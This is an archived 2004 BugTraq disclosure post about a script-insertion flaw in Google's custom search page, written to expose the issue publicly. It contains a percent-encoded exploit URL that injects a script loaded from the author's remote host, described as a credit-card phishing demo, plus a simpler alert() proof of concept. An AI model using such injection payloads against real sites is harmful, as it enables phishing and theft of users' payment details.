BugTraq
Google Script Insertion Exploit Oct 19 2004 04:38PM
Jim Ley (jim jibbering com)


Website: www.google.com

Description: Google's custom websearch does not prevent javascript from

being inserted into the url of the image, allowing malicious users to modify

the content of the google page allowing in phishing attacks, or silently

steal search terms/results/clicks or modify actual searches to always

contain controlled results. With Googles trusted status, the risk is almost

certainly high.

The exploit is easiest to produce through a custom google search form which

are commonly seen, used and understood on the web, but you can also do it

through a simple link, this one works in IE:

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%
61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%
64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%
65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%
74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%
2e%6a%73%27

(This is an example of using the exploit for phishing, it changes the google

search page to a page informing the user, that google is now a chargeable

service and they should enter their credit card details to continue, these

are then logged on my site and the user is returned to a working google -

currently there's an confirm box warning the user before the form is

submitted.)

This example only works in IE, but other UA's also execute the javascript -

it being a Google vulnerability, not an IE one.

The exploit can be simply demonstrated with, the simpler url:

http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')

The exploit has been public for over 2 years, and google have been informed

on multiple occasions.

More information, and another example exploit at

http://jibbering.com/2004/10/google.html

Jim Ley.

http://jibbering.com/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus